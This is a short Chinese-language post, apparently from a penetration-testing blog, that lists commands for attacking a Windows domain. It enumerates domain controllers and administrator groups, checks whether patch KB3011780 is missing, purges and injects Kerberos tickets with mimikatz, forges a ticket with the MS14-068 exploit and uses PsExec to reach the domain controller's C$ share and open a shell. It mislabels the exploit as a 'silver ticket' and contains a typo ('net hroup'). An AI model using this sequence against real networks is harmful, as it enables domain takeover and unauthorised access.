关于域渗透白银票据MS14068一些常用命令
关于域渗透白银票据MS14068一些常用命令
渗透测试过程中,拿域控是常见的,也可能有的服务器没有域控
常用命令如下:
关于
排查端口
53,3389端口
net time /domain 请求当前时间
ipconfig /all配置文件
nltest /DCLIST:test.com 多域控
net group "Domain Controllers" /domain
net group "domain admins" /domain 管理员
net hroup /domain 组
MS14068白银票据
排查补丁:systeminfo | find KB3011780
先使用mimikatz清除票据
kerberos::list
kerberos::purge
kerberos::list
whoami/all
利用格式
生成票据
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
kerberos::purge
kerberos::list
kerberos::ptc
dir \\win2008.com\c$
psExec.exe \\win2008.com\ cmd.exe\ 提升权限
whoami
dir \\win2008.com\c$
<< 上一篇
下一篇 >>